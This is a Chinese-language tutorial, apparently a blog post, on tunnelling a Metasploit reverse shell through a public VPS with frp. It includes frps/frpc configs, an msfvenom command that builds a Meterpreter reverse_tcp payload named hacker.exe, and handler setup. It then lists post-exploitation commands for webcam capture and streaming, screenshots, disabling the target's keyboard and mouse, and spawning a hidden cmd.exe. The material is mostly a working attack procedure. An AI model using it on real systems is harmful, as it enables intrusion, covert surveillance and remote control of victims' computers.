- 实验环境:
- 目标内网主机(win2003)
- 公网vps
- 虚拟机kali
主思路是:
公网vps跑frp server
本地kali跑frp client
将kali本地端口映射到vps
- 下载frp(分为windos和linux,按需求下载)
https://github.com/fatedier/frp/releases
- 首先在公网上配置服务端(frps.ini)
[common]
bind_port = 6666

- 配置完启动服务端
frps.exe -c frps.ini

- 配置客户端
[common]
server_addr = 120.xx.xx.xx #这里是公网vps的ip
server_port = 6666 #这里的端口要跟服务端的一样
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 1234 # 转发给本地的1234端口
remote_port = 1080 #服务端的1080端口转发给本地的1234端口
客户端通过vps的ip和6666端口建立连接,把本地1234端口数据传递给公网的1080端口

- 配置完,启动客户端
./frpc -c ./frpc.ini

- 到这里frp就配置完了,接下来只剩生成木马,监听端口等待目标上线了
- msf生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网ip LPORT=1080 -f exe > /root/hacker.exe
- 监听本地接受数据的端口
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 1234
exploit
详情请看
https://www.jianshu.com/p/5fde59d8e51d
- 然后把生成的hacker.exe上传到目标主机运行即可
webcan_snap #利用摄像头拍照
screenshot #截屏
uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
uictl disable mouse #禁用鼠标
uictl disable keyboard #禁用键盘
webcam摄像头命令
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频
execute执行文件
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
网友评论